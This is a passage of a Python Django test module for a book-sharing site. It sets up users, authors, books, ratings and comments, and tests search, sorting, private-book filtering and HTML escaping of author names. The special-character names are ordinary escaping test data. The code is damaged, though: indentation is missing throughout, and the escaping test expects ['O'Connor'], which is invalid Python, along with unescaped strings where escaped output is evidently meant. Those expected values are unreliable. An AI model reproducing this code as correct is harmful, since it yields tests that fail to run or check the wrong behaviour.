cls.anonymous_user = auth.get_user(client)
cls.user1 = User.objects.create_user('user1', '[email protected]', 'testpassword1')
cls.user2 = User.objects.create_user('user2', '[email protected]', 'testpassword2')
cls.user3 = User.objects.create_user('user3', '[email protected]', 'testpassword3')
cls.user4 = User.objects.create_user('user4', '[email protected]', 'testpassword4')
cls.user5 = User.objects.create_user('user5', '[email protected]', 'testpassword5')
cls.user6 = User.objects.create_user('user6', '[email protected]', 'testpassword6')
cls.the_user1 = TheUser.objects.get(id_user=cls.user1)
cls.the_user2 = TheUser.objects.get(id_user=cls.user2)
cls.the_user5 = TheUser.objects.get(id_user=cls.user5)
cls.the_user6 = TheUser.objects.get(id_user=cls.user6)
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_categories(cls):
cls.category1 = Category.objects.create(category_name='category1')
cls.category2 = Category.objects.create(category_name='category2')
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_authors(cls):
cls.author1 = Author.objects.create(author_name='Best Author 1')
cls.author2 = Author.objects.create(author_name='trueAuthorNew')
cls.author3 = Author.objects.create(author_name='zlast author')
cls.author4 = Author.objects.create(author_name='<AuthorSpecialSymbols>&"')
cls.author5 = Author.objects.create(author_name="O'Connor")
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_languages(cls):
cls.language_en = Language.objects.create(language='English')
cls.language_ru = Language.objects.create(language='Russian')
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_books(cls):
test_book_path = os.path.join(TEST_DATA_DIR, 'test_book.pdf')
test_book_image_path = os.path.join(TEST_DATA_DIR, 'test_book_image.png')
books_setup = [
{
'name': 'First Book',
'author': cls.author1,
'category': cls.category1,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user1,
'private': True
},
{
'name': 'Second Book',
'author': cls.author2,
'category': cls.category1,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'who_added': cls.the_user2,
'blocked_book': True
},
{
'name': 'Third Book',
'author': cls.author2,
'category': cls.category1,
'language': cls.language_ru,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user1,
'blocked_book': True
},
{
'name': 'Fourth Book',
'author': cls.author1,
'category': cls.category1,
'language': cls.language_ru,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user2,
'blocked_book': True
},
{
'name': 'Fifth Book',
'author': cls.author1,
'category': cls.category2,
'language': cls.language_ru,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'who_added': cls.the_user1,
'private': True
},
{
'name': 'Sixth Book',
'author': cls.author2,
'category': cls.category2,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user2
},
{
'name': 'Seventh Book<>&"',
'author': cls.author4,
'category': cls.category2,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user2
}
]
for book in books_setup:
Book.objects.create(
book_name=book['name'],
id_author=book['author'],
id_category=book['category'],
description='TEST description',
language=book['language'],
book_file=book['file'],
photo=book.get('photo', False),
who_added=book['who_added'],
private_book=book.get('private', False),
blocked_book=book.get('blocked_book', False)
)
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_added_books(cls):
AddedBook.objects.create(id_user=cls.the_user1, id_book=Book.objects.get(book_name='Third Book'))
AddedBook.objects.create(id_user=cls.the_user1, id_book=Book.objects.get(book_name='Sixth Book'))
AddedBook.objects.create(id_user=cls.the_user1, id_book=Book.objects.get(book_name='Fourth Book'))
AddedBook.objects.create(id_user=cls.the_user2, id_book=Book.objects.get(book_name='Third Book'))
AddedBook.objects.create(id_user=cls.the_user2, id_book=Book.objects.get(book_name='Sixth Book'))
AddedBook.objects.create(id_user=cls.the_user2, id_book=Book.objects.get(book_name='Second Book'))
AddedBook.objects.create(id_user=cls.the_user5, id_book=Book.objects.get(book_name='Sixth Book'))
AddedBook.objects.create(id_user=cls.the_user6, id_book=Book.objects.get(book_name='Sixth Book'))
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_book_rating(cls):
BookRating.objects.create(id_book=Book.objects.get(book_name='Third Book'), id_user=cls.the_user1, rating=10)
BookRating.objects.create(id_book=Book.objects.get(book_name='Third Book'), id_user=cls.the_user2, rating=5)
BookRating.objects.create(id_book=Book.objects.get(book_name='Third Book'), id_user=cls.the_user5, rating=3)
BookRating.objects.create(id_book=Book.objects.get(book_name='Fourth Book'), id_user=cls.the_user1, rating=7)
BookRating.objects.create(id_book=Book.objects.get(book_name='Sixth Book'), id_user=cls.the_user1, rating=4)
BookRating.objects.create(id_book=Book.objects.get(book_name='Second Book'), id_user=cls.the_user2, rating=7)
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_book_comment(cls):
second_book = Book.objects.get(book_name='Second Book')
third_book = Book.objects.get(book_name='Third Book')
fourth_book = Book.objects.get(book_name='Fourth Book')
BookComment.objects.create(id_book=second_book, id_user=cls.the_user1, text='Test book 2 user 1')
BookComment.objects.create(id_book=second_book, id_user=cls.the_user2, text='Test book 2 user 2')
BookComment.objects.create(id_book=third_book, id_user=cls.the_user1, text='Test book 3 user 1')
BookComment.objects.create(id_book=fourth_book, id_user=cls.the_user1, text='Test book 4 user 1')
BookComment.objects.create(id_book=fourth_book, id_user=cls.the_user5, text='Test book 4 user 5')
# ------------------------------------------------------------------------------------------------------------------
@classmethod
@mock.patch('app.signals.email_dispatch.apply_async', new=mock.Mock())
def setup_post_messages(cls):
Post.objects.create(user=cls.the_user1, heading='post 1', text='Posted test text 1')
Post.objects.create(user=cls.the_user1, heading='post 2', text='Posted test text 2')
Post.objects.create(user=cls.the_user2, heading='post 3', text='Posted test text 3')
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_support_messages(cls):
SupportMessage.objects.create(email='[email protected]', text='Test text1')
SupportMessage.objects.create(email='[email protected]', text='Test text2')
SupportMessage.objects.create(email='[email protected]', text='Test text3')
SupportMessage.objects.create(email='[email protected]', text='Test text4')
# ------------------------------------------------------------------------------------------------------------------
def test_the_user_str(self):
self.assertEqual(str(self.the_user1), 'user1')
self.assertEqual(str(self.the_user2), 'user2')
# ------------------------------------------------------------------------------------------------------------------
def test_creating_the_user_objects(self):
"""
        Must create an 'app.models.TheUser' instance after a django User instance is created.
"""
self.assertEqual(User.objects.all().count(), 6)
self.assertEqual(User.objects.all().count(), TheUser.objects.all().count())
self.assertNotEqual(self.the_user1.auth_token, '')
self.assertNotEqual(self.the_user1.auth_token, self.the_user2.auth_token)
# ------------------------------------------------------------------------------------------------------------------
def test_the_user_get_api_reminders(self):
reminders = self.the_user1.get_api_reminders()
reminders_keys_correct = ['vk', 'fb_group', 'fb_page', 'twitter', 'disabled_all', 'app_rate']
self.assertTrue(isinstance(reminders, dict))
self.assertEqual(sorted(list(reminders.keys())), sorted(reminders_keys_correct))
# ------------------------------------------------------------------------------------------------------------------
def test_the_user_get_web_reminders(self):
reminders = self.the_user1.get_web_reminders()
reminders_keys_correct = ['vk', 'fb_group', 'fb_page', 'twitter', 'disabled_all', 'app_download']
self.assertTrue(isinstance(reminders, dict))
self.assertEqual(sorted(list(reminders.keys())), sorted(reminders_keys_correct))
# ------------------------------------------------------------------------------------------------------------------
def test_the_user_update_reminder(self):
reminders = self.the_user1.get_web_reminders()
self.assertTrue(isinstance(reminders, dict))
self.assertEqual(reminders['vk'], True)
self.assertEqual(reminders['app_download'], True)
self.the_user1.update_reminder('vk', False)
self.the_user1.update_reminder('app_download', False)
updated_reminders = self.the_user1.get_web_reminders()
self.assertTrue(isinstance(updated_reminders, dict))
self.assertEqual(updated_reminders['vk'], False)
self.assertEqual(updated_reminders['app_download'], False)
# ------------------------------------------------------------------------------------------------------------------
def test_removing_user_objects(self):
"""
        Must remove the django User instance after the 'app.models.TheUser' object is deleted.
"""
the_user3 = TheUser.objects.get(id_user__username='user3')
the_user4 = TheUser.objects.get(id_user__email='[email protected]')
the_user3.delete()
the_user4.delete()
self.assertEqual(User.objects.all().count(), 4)
self.assertEqual(User.objects.all().count(), TheUser.objects.all().count())
# ------------------------------------------------------------------------------------------------------------------
def test_created_categories(self):
self.assertEqual(Category.objects.all().count(), 2)
self.assertNotEqual(self.category1, self.category2)
# ------------------------------------------------------------------------------------------------------------------
def test_categories_str(self):
self.assertEqual(str(self.category1), 'category1')
self.assertEqual(str(self.category2), 'category2')
# ------------------------------------------------------------------------------------------------------------------
def test_created_authors(self):
self.assertEqual(Author.objects.all().count(), 5)
self.assertNotEqual(self.author1, self.author2)
# ------------------------------------------------------------------------------------------------------------------
def test_get_authors_list(self):
"""
Must return authors list depending on different letters/letter case/words/symbols.
"""
self.assertEqual(Author.get_authors_list('bEst'), ['Best Author 1'])
self.assertEqual(Author.get_authors_list('1'), ['Best Author 1'])
self.assertEqual(Author.get_authors_list(' '), ['Best Author 1', 'zlast author'])
self.assertEqual(Author.get_authors_list('new'), ['trueAuthorNew'])
self.assertEqual(Author.get_authors_list('TRUE'), ['trueAuthorNew'])
self.assertEqual(Author.get_authors_list('Best Author 1'), ['Best Author 1'])
self.assertEqual(Author.get_authors_list('trueAuthorNew'), ['trueAuthorNew'])
# ------------------------------------------------------------------------------------------------------------------
def test_get_authors_list_with_escaping(self):
self.assertEqual(Author.get_authors_list("'", True), ['O'Connor'])
self.assertEqual(Author.get_authors_list("Connor", True), ['O'Connor'])
self.assertEqual(
Author.get_authors_list('b', True),
['Best Author 1', '<AuthorSpecialSymbols>&"']
)
self.assertEqual(
Author.get_authors_list('e', True),
['Best Author 1', 'trueAuthorNew', '<AuthorSpecialSymbols>&"']
)
self.assertEqual(
Author.get_authors_list('author', True),
['Best Author 1', 'trueAuthorNew', 'zlast author', '<AuthorSpecialSymbols>&"']
)
# ------------------------------------------------------------------------------------------------------------------
def test_get_authors_list_without_escaping(self):
self.assertEqual(Author.get_authors_list("'"), ["O'Connor"])
self.assertEqual(Author.get_authors_list("Connor", False), ["O'Connor"])
self.assertEqual(Author.get_authors_list('b'), ['Best Author 1', '<AuthorSpecialSymbols>&"'])
self.assertEqual(
Author.get_authors_list('e'),
['Best Author 1', 'trueAuthorNew', '<AuthorSpecialSymbols>&"']
)
self.assertEqual(
Author.get_authors_list('author', False),
['Best Author 1', 'trueAuthorNew', 'zlast author', '<AuthorSpecialSymbols>&"']
)
# ------------------------------------------------------------------------------------------------------------------
def test_created_language(self):
self.assertEqual(Language.objects.all().count(), 2)
        self.assertNotEqual(self.language_en, self.language_ru)
# ------------------------------------------------------------------------------------------------------------------
def test_created_books(self):
books = Book.objects.all()
self.assertEqual(books.count(), 7)
self.assertEqual(books.filter(private_book=True).count(), 2)
self.assertEqual(books.filter(id_category=self.category1).count(), 4)
self.assertEqual(books.filter(id_author=self.author1).count(), 3)
self.assertEqual(books.filter(language=self.language_en).count(), 4)
self.assertEqual(books.filter(photo=False).count(), 2)
self.assertEqual(books.filter(who_added=self.the_user1).count(), 3)
self.assertEqual(books.filter(id_category=self.category2, id_author=self.author2).count(), 1)
self.assertEqual(books.filter(id_category=self.category1,
id_author=self.author2,
language=self.language_ru,
who_added=self.the_user1).count(), 1)
self.assertEqual(books.filter(id_category=self.category1,
id_author=self.author2,
language=self.language_ru,
who_added=self.the_user2).count(), 0)
self.assertEqual(books.filter(blocked_book=True).count(), 3)
# ------------------------------------------------------------------------------------------------------------------
def test_get_related_objects_for_create(self):
test_book_path = os.path.join(TEST_DATA_DIR, 'test_book.pdf')
form_data = {
'bookname': 'The new book',
'author': 'trueAuthorNew',
'category': 'category1',
'language': 'English',
'about': 'about book',
'bookfile': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
}
form_data_new_author = copy.deepcopy(form_data)
form_data_new_author['author'] = 'super new author'
self.assertEqual(Author.objects.all().count(), 5)
form = AddBookForm(data=form_data)
form.is_valid()
form_with_new_author = AddBookForm(data=form_data_new_author)
form_with_new_author.is_valid()
related_data = Book.get_related_objects_for_create(self.user1.id, form)
self.assertTrue(isinstance(related_data, BookRelatedData))
self.assertEqual(len(related_data), 4)
self.assertEqual(related_data.author, Author.objects.get(author_name='trueAuthorNew'))
self.assertEqual(Author.objects.all().count(), 5)
related_data_new_author = Book.get_related_objects_for_create(self.user1.id, form_with_new_author)
self.assertTrue(isinstance(related_data, BookRelatedData))
self.assertEqual(len(related_data_new_author), 4)
self.assertEqual(related_data_new_author.author, Author.objects.get(author_name='super new author'))
self.assertEqual(Author.objects.all().count(), 6)
# ------------------------------------------------------------------------------------------------------------------
def test_get_related_objects_create_api(self):
"""
        Must generate Book related data when creating a Book object for API calls.
        A new author must be returned if its name is not present in the Author model.
"""
test_data = {'author': 'trueAuthorNew', 'category': 'category2', 'language': 'Russian'}
test_data_new_author = {'author': 'NEW AUTHOR', 'category': 'category1', 'language': 'English'}
self.assertEqual(
Book.get_related_objects_create_api(self.the_user1, test_data),
BookRelatedData(self.author2, self.category2, self.language_ru, None)
)
self.assertEqual(Author.objects.all().count(), 5)
self.assertEqual(
Book.get_related_objects_create_api(self.the_user1, test_data_new_author),
BookRelatedData(Author.objects.get(author_name='NEW AUTHOR'), self.category1, self.language_en, None)
)
self.assertEqual(Author.objects.all().count(), 6)
# ------------------------------------------------------------------------------------------------------------------
def test_get_related_objects_selected_book_unknown_user(self):
"""
Must generate selected book related data for unknown (anonymous) users.
"""
third_book = Book.objects.get(book_name='Third Book')
sixth_book = Book.objects.get(book_name='Sixth Book')
self.assertTrue(isinstance(Book.get_related_objects_selected_book(self.anonymous_user, third_book.id), dict))
related_third_book = Book.get_related_objects_selected_book(self.anonymous_user, third_book.id)
related_sixth_book = Book.get_related_objects_selected_book(self.anonymous_user, sixth_book.id)
self.assertEqual(related_third_book['book'], third_book)
self.assertEqual(related_third_book['avg_book_rating'], {'rating__avg': 6.0})
self.assertEqual(related_third_book['book_rating_count'], 3)
self.assertEqual(related_third_book['added_book'], None)
self.assertEqual(related_third_book['comments'].count(), 1)
self.assertEqual(related_third_book['comments'][0],
BookComment.objects.filter(id_book=third_book).order_by('-id')[0])
self.assertEqual(related_sixth_book['book'], sixth_book)
self.assertEqual(related_sixth_book['avg_book_rating'], {'rating__avg': 4.0})
self.assertEqual(related_sixth_book['book_rating_count'], 1)
self.assertEqual(related_sixth_book['added_book'], None)
self.assertEqual(related_sixth_book['comments'].count(), 0)
AddedBook.objects.create(id_user=self.the_user5, id_book=third_book)
BookRating.objects.create(id_user=self.the_user6, id_book=third_book, rating=10)
BookComment.objects.create(id_user=self.the_user6, id_book=third_book, text='TEST TEXT 2')
related_third_book = Book.get_related_objects_selected_book(self.anonymous_user, third_book.id)
self.assertEqual(related_third_book['book'], third_book)
self.assertEqual(related_third_book['avg_book_rating'], {'rating__avg': 7.0})
self.assertEqual(related_third_book['book_rating_count'], 4)
self.assertEqual(related_third_book['added_book'], None)
self.assertEqual(related_third_book['comments'].count(), 2)
# ------------------------------------------------------------------------------------------------------------------
def test_get_related_objects_selected_book_added_user(self):
"""
        This case tests only the 'added_book' param, because for a user who is reading
        the book only this attribute will change, relative to the test above.
"""
third_book = Book.objects.get(book_name='Third Book')
sixth_book = Book.objects.get(book_name='Sixth Book')
self.assertTrue(isinstance(Book.get_related_objects_selected_book(self.the_user1.id_user, third_book.id), dict))
related_third_book = Book.get_related_objects_selected_book(self.the_user1.id_user, third_book.id)
related_sixth_book = Book.get_related_objects_selected_book(self.the_user1.id_user, sixth_book.id)
self.assertEqual(related_third_book['added_book'],
AddedBook.objects.get(id_book=third_book, id_user=self.the_user1))
self.assertEqual(related_sixth_book['added_book'],
AddedBook.objects.get(id_book=sixth_book, id_user=self.the_user1))
# ------------------------------------------------------------------------------------------------------------------
def test_get_related_objects_selected_book_with_user_key(self):
"""
        Tests returning related-object data for the selected book with the 'user_key' attribute, meaning that
        the user is anonymous (i.e. not logged in) but supplies a user key. Done for API request access.
"""
third_book = Book.objects.get(book_name='Third Book')
related_third_book = Book.get_related_objects_selected_book(
self.anonymous_user, third_book.id, self.the_user1.auth_token
)
self.assertEqual(related_third_book['book'], third_book)
self.assertEqual(related_third_book['avg_book_rating'], {'rating__avg': 6.0})
self.assertEqual(related_third_book['book_rating_count'], 3)
self.assertEqual(related_third_book['added_book'],
AddedBook.objects.get(id_book=third_book, id_user=self.the_user1))
self.assertEqual(related_third_book['comments'].count(), 1)
self.assertEqual(related_third_book['comments'][0],
BookComment.objects.filter(id_book=third_book).order_by('-id')[0])
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_book_name_category1(self):
"""
Must generate correct dictionaries for anonymous users, users with private books and without.
Testing first category.
"""
first_book = Book.objects.get(book_name='First Book')
third_book = Book.objects.get(book_name='Third Book')
fourth_book = Book.objects.get(book_name='Fourth Book')
first_book_dict = Utils.generate_sort_dict(first_book)
third_book_dict = Utils.generate_sort_dict(third_book)
fourth_book_dict = Utils.generate_sort_dict(fourth_book)
self.assertTrue(isinstance(Book.sort_by_book_name(self.anonymous_user, self.category1), list))
self.assertEqual(len(Book.sort_by_book_name(self.anonymous_user, self.category1)), 3)
self.assertEqual(Book.sort_by_book_name(self.anonymous_user, self.category1)[0], fourth_book_dict)
self.assertEqual(Book.sort_by_book_name(self.anonymous_user, self.category1)[2], third_book_dict)
self.assertEqual(len(Book.sort_by_book_name(self.the_user2.id_user, self.category1)), 3)
self.assertEqual(Book.sort_by_book_name(self.the_user2.id_user, self.category1)[0], fourth_book_dict)
self.assertEqual(Book.sort_by_book_name(self.the_user2.id_user, self.category1)[2], third_book_dict)
self.assertEqual(len(Book.sort_by_book_name(self.the_user1.id_user, self.category1)), 4)
self.assertEqual(Book.sort_by_book_name(self.the_user1.id_user, self.category1)[0], first_book_dict)
self.assertEqual(Book.sort_by_book_name(self.the_user1.id_user, self.category1)[3], third_book_dict)
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_book_name_category2(self):
"""
Must generate correct dictionaries for anonymous users, users with private books and without.
        Testing second category.
"""
fifth_book = Book.objects.get(book_name='Fifth Book')
seventh_book = Book.objects.get(book_name='Seventh Book<>&"')
fifth_book_dict = Utils.generate_sort_dict(fifth_book)
seventh_book_dict = Utils.generate_sort_dict(seventh_book)
self.assertEqual(len(Book.sort_by_book_name(self.anonymous_user, self.category2)), 2)
self.assertEqual(Book.sort_by_book_name(self.anonymous_user, self.category2)[0], seventh_book_dict)
self.assertEqual(len(Book.sort_by_book_name(self.the_user2.id_user, self.category2)), 2)
self.assertEqual(Book.sort_by_book_name(self.the_user2.id_user, self.category2)[0], seventh_book_dict)
self.assertEqual(len(Book.sort_by_book_name(self.the_user1.id_user, self.category2)), 3)
self.assertEqual(Book.sort_by_book_name(self.the_user1.id_user, self.category2)[0], fifth_book_dict)
self.assertEqual(Book.sort_by_book_name(self.the_user1.id_user, self.category2)[1], seventh_book_dict)
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_author_category1(self):
"""
Must generate correct dictionaries for anonymous users, users with private books and without.
Testing returned book authors at first category.
"""
self.assertTrue(isinstance(Book.sort_by_author(self.anonymous_user, self.category1), list))
self.assertEqual(len(Book.sort_by_author(self.anonymous_user, self.category1)), 3)
self.assertEqual(Book.sort_by_author(self.anonymous_user, self.category1)[0]['author'],
self.author1.author_name)
self.assertEqual(Book.sort_by_author(self.anonymous_user, self.category1)[2]['author'],
self.author2.author_name)
self.assertEqual(len(Book.sort_by_author(self.the_user2.id_user, self.category1)), 3)
self.assertEqual(Book.sort_by_author(self.the_user2.id_user, self.category1)[0]['author'],
self.author1.author_name)
self.assertEqual(Book.sort_by_author(self.the_user2.id_user, self.category1)[2]['author'],
self.author2.author_name)
self.assertEqual(len(Book.sort_by_author(self.the_user1.id_user, self.category1)), 4)
self.assertEqual(Book.sort_by_author(self.the_user1.id_user, self.category1)[0]['author'],
self.author1.author_name)
self.assertEqual(Book.sort_by_author(self.the_user1.id_user, self.category1)[3]['author'],
self.author2.author_name)
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_author_category2(self):
"""
Must generate correct dictionaries for anonymous users, users with private books and without.
Testing returned book authors at second category.
"""
        escaped_author_name = '&lt;AuthorSpecialSymbols&gt;&amp;&quot;'
self.assertEqual(len(Book.sort_by_author(self.anonymous_user, self.category2)), 2)
self.assertEqual(Book.sort_by_author(self.anonymous_user, self.category2)[0]['author'], escaped_author_name)
self.assertEqual(len(Book.sort_by_author(self.the_user2.id_user, self.category2)), 2)
self.assertEqual(Book.sort_by_author(self.the_user2.id_user, self.category2)[0]['author'], escaped_author_name)
self.assertEqual(len(Book.sort_by_author(self.the_user1.id_user, self.category2)), 3)
self.assertEqual(Book.sort_by_author(self.the_user1.id_user, self.category2)[0]['author'], escaped_author_name)
self.assertEqual(Book.sort_by_author(self.the_user1.id_user, self.category2)[1]['author'],
self.author1.author_name)
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_estimation_category1(self):
"""
Must generate correct dictionaries for anonymous users, users with private books and without.
Testing returned book rating at first category.
"""
self.assertTrue(isinstance(Book.sort_by_estimation(self.anonymous_user, self.category1), list))
self.assertEqual(len(Book.sort_by_estimation(self.anonymous_user, self.category1)), 3)
self.assertEqual(Book.sort_by_estimation(self.anonymous_user, self.category1)[0]['rating'], 7)
self.assertEqual(Book.sort_by_estimation(self.anonymous_user, self.category1)[2]['rating'], 6)
self.assertEqual(len(Book.sort_by_estimation(self.the_user2.id_user, self.category1)), 3)
self.assertEqual(Book.sort_by_estimation(self.the_user2.id_user, self.category1)[0]['rating'], 7)
self.assertEqual(Book.sort_by_estimation(self.the_user2.id_user, self.category1)[2]['rating'], 6)
self.assertEqual(len(Book.sort_by_estimation(self.the_user1.id_user, self.category1)), 4)
self.assertEqual(Book.sort_by_estimation(self.the_user1.id_user, self.category1)[0]['rating'], 7)
self.assertEqual(Book.sort_by_estimation(self.the_user1.id_user, self.category1)[2]['rating'], 6)
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_estimation_category2(self):
"""
Must generate correct dictionaries for anonymous users, users with private books and without.
Testing returned book rating at second category.
"""
self.assertEqual(len(Book.sort_by_estimation(self.anonymous_user, self.category2)), 2)
self.assertEqual(Book.sort_by_estimation(self.anonymous_user, self.category2)[0]['rating'], 4)
self.assertEqual(len(Book.sort_by_estimation(self.the_user2.id_user, self.category2)), 2)
self.assertEqual(Book.sort_by_estimation(self.the_user2.id_user, self.category2)[0]['rating'], 4)
self.assertEqual(len(Book.sort_by_estimation(self.the_user1.id_user, self.category2)), 3)
self.assertEqual(Book.sort_by_estimation(self.the_user1.id_user, self.category2)[0]['rating'], 4)
self.assertEqual(Book.sort_by_estimation(self.the_user1.id_user, self.category2)[1]['rating'], None)
# ------------------------------------------------------------------------------------------------------------------
def test_sort_by_readable(self):
"""
        Must generate correct data for the most readable books for anonymous users and users with private books.
Testing count of sorted books with and without selected categories.
"""
sorted_structure = Book.sort_by_readable(self.anonymous_user, self.category1)
self.assertTrue(isinstance(sorted_structure, list))
self.assertTrue(isinstance(sorted_structure[0], dict))
self.assertEqual(set(sorted_structure[0].keys()), {'id', 'name', 'author', 'url'})
self.assertEqual(len(Book.sort_by_readable(user=self.anonymous_user, category=self.category1)), 3)
self.assertEqual(len(Book.sort_by_readable(user=self.anonymous_user, category=self.category1, count=2)), 2)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user1.id_user, category=self.category1)), 3)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user1.id_user, category=self.category1, count=2)), 2)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user2.id_user, category=self.category1)), 3)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user2.id_user, category=self.category1, count=2)), 2)
self.assertEqual(len(Book.sort_by_readable(user=self.anonymous_user)), 4)
self.assertEqual(len(Book.sort_by_readable(user=self.anonymous_user, count=2)), 2)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user1.id_user)), 4)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user1.id_user, count=3)), 3)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user2.id_user)), 4)
self.assertEqual(len(Book.sort_by_readable(user=self.the_user2.id_user, count=2)), 2)
# ------------------------------------------------------------------------------------------------------------------
def test_generate_books(self):
"""
Must generate correct dictionaries for Book data.
"""
books = Book.objects.all()
self.assertTrue(isinstance(Book.generate_books(books), list))
self.assertEqual(len(Book.generate_books(books)), 7)
self.assertEqual(len(Book.generate_books(books)[0].keys()), 5)
self.assertEqual(Book.generate_books(books)[0], Utils.generate_sort_dict(books[0]))
self.assertEqual(Book.generate_books(books)[6], Utils.generate_sort_dict(books[6]))
# ------------------------------------------------------------------------------------------------------------------
def test_fetch_books(self):
"""
Must generate list of dicts with Books data depending on different criteria.
"""
self.assertTrue(isinstance(Book.fetch_books('book'), list))
self.assertEqual(len(Book.fetch_books('Second Book')), 1)
self.assertEqual(len(Book.fetch_books('book')), 7)
self.assertEqual(len(Book.fetch_books('ook')), 7)
self.assertEqual(len(Book.fetch_books('trueAuthorNew')), 3)
self.assertEqual(len(Book.fetch_books('author')), 7)
self.assertEqual(len(Book.fetch_books('new')), 3)
self.assertEqual(len(Book.fetch_books('True')), 3)
# ------------------------------------------------------------------------------------------------------------------
def test_generate_existing_books(self):
"""
Must generate list of dicts with Books data depending on different criteria and excluding private books.
"""
self.assertTrue(isinstance(Book.generate_existing_books('book'), list))
self.assertEqual(len(Book.generate_existing_books('book')), 5)
self.assertEqual(len(Book.generate_existing_books('Book')), 5)
self.assertEqual(len(Book.generate_existing_books('bOoK')), 5)
fourth_book = Book.objects.get(book_name='Fourth Book')
test_book = Book.generate_existing_books('fourth')
self.assertEqual(len(test_book), 1)
self.assertTrue(isinstance(test_book[0], dict))
self.assertEqual(test_book[0], {'url': reverse('book', args=[fourth_book.id]),
'name': fourth_book.book_name})
test_private_book = Book.generate_existing_books('fifth')
self.assertEqual(len(test_private_book), 0)
# ------------------------------------------------------------------------------------------------------------------
def test_exclude_private_books(self):
"""
Must generate query sets or lists with Books depending on user type.
"""
all_books = Book.objects.all()
list_all_books = list(all_books)
self.assertEqual(Book.exclude_private_books(self.the_user1.id_user, all_books).count(), 7)
self.assertEqual(Book.exclude_private_books(self.the_user2.id_user, all_books).count(), 5)
self.assertTrue(isinstance(Book.exclude_private_books(self.the_user1.id_user, all_books), QuerySet))
self.assertTrue(isinstance(Book.exclude_private_books(self.the_user2.id_user, all_books), QuerySet))
self.assertEqual(len(Book.exclude_private_books(self.the_user1.id_user, list_all_books)), 7)
self.assertEqual(len(Book.exclude_private_books(self.the_user2.id_user, list_all_books)), 5)
self.assertTrue(isinstance(Book.exclude_private_books(self.the_user1.id_user, list_all_books), list))
self.assertTrue(isinstance(Book.exclude_private_books(self.the_user2.id_user, list_all_books), list))
self.assertTrue(self.anonymous_user.is_anonymous)
self.assertEqual(Book.exclude_private_books(self.anonymous_user, all_books).count(), 5)
self.assertEqual(len(Book.exclude_private_books(self.anonymous_user, list_all_books)), 5)
self.assertTrue(isinstance(Book.exclude_private_books(self.anonymous_user, all_books), QuerySet))
self.assertTrue(isinstance(Book.exclude_private_books(self.anonymous_user, list_all_books), list))
# ------------------------------------------------------------------------------------------------------------------
def test_added_books(self):
self.assertEqual(AddedBook.objects.all().count(), 8)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user1).count(), 3)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user2).count(), 3)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user5).count(), 1)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user6).count(), 1)
self.assertEqual(AddedBook.objects.filter(id_book=Book.objects.get(book_name='Sixth Book')).count(), 4)
self.assertEqual(AddedBook.objects.filter(id_book=Book.objects.get(book_name='Third Book')).count(), 2)
self.assertEqual(AddedBook.objects.filter(id_book=Book.objects.get(book_name='Fifth Book')).count(), 0)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user1,
id_book=Book.objects.get(book_name='Third Book')).count(), 1)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user1,
id_book=Book.objects.get(book_name='Sixth Book')).count(), 1)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user2,
id_book=Book.objects.get(book_name='Sixth Book')).count(), 1)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user2,
id_book=Book.objects.get(book_name='Fourth Book')).count(), 0)
# ------------------------------------------------------------------------------------------------------------------
def test_added_books_change(self):
"""
Must save book page after changing it.
"""
added_book3 = AddedBook.objects.get(id_user=self.the_user1, id_book=Book.objects.get(book_name='Third Book'))
added_book6 = AddedBook.objects.get(id_user=self.the_user2, id_book=Book.objects.get(book_name='Sixth Book'))
self.assertEqual(added_book3.last_page, 1)
self.assertEqual(added_book6.last_page, 1)
added_book3.last_page = 500
added_book3.save()
self.assertEqual(added_book3.last_page, 500)
self.assertEqual(added_book6.last_page, 1)
added_book6.last_page = 256
added_book6.save()
self.assertEqual(added_book3.last_page, 500)
self.assertEqual(added_book6.last_page, 256)
# ------------------------------------------------------------------------------------------------------------------
def test_added_books_delete(self):
added_book_third = AddedBook.objects.get(id_user=self.the_user1,
id_book=Book.objects.get(book_name='Third Book'))
